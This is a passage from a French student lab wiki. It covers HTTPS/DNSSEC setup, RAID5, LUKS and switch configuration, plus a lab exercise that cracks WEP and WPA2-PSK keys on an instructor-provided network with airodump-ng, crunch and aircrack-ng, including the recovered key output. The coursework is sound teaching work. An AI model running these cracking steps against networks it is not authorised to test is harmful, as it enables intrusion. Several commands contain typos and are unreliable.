! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. &lt;br /&gt;
La manipulation des disques dur restera toujours une opération délicate demandant un maximum d'attention et ne devant pas se faire à la va-vite. Rien de mieux qu'un bon dimanche pluvieux pour s'aventurer dans ces contrées. Ne jamais oublier que les erreurs de manipulation sur les disques sont souvent irréversibles. Vous l'aurez compris, je vous dis tout ça afin de vous désigner comme seul responsable en cas de problèmes qui pourraient survenir sur votre matériel.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. &lt;br /&gt;
==== Remettre à zero la clef USB ====&lt;br /&gt;
Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sda''' (il peut aussi s'appeler sdb ,sdc ...)&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sda&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1): '''1'''&lt;br /&gt;
First sector (1-1953525167, default 2048):'''1'''&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size 7.1GiB.&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de la Clef ====&lt;br /&gt;
La clef est prête, on peut desormais crypter et l'utiliser avec l'utilitaire cyptsetup.&lt;br /&gt;
Pour créer le cryptage au format Luks :&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
==== Accès à la partition cryptée ====&lt;br /&gt;
Maintenant que la clef est cryptée, on peut l'utiliser. Pour commencer, on va monter le répertoire pour pouvoir l'ouvrir. Commencez par créer un repertoire '''/mnt/clef_usb_cryptee''' puis taper la suite de commande :&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb home -- ouverture de la clef&lt;br /&gt;
    mkfs.ext4 /dev/mapper/home -- Système de fichier relié &lt;br /&gt;
    mount -t ext4 /dev/mapper/home /mnt/clef_usb_cryptee&lt;br /&gt;
&lt;br /&gt;
On peut maintenant acceder au contenu de la clef et le modifier via le dossier '''/mnt/clef_usb_cryptee'''&lt;br /&gt;
&lt;br /&gt;
==== Debrancher la partition cryptée ====&lt;br /&gt;
Pour débrancher la clef, il faut au préalable démonter la partition et refermer l'utilitaire via les commandes:&lt;br /&gt;
  umount /mnt/clef_usb_cryptee -- Demonter le repertoire&lt;br /&gt;
  cryptsetup close --type luks home&lt;br /&gt;
Et voila, vous pouvez désormais retirer la clef.&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
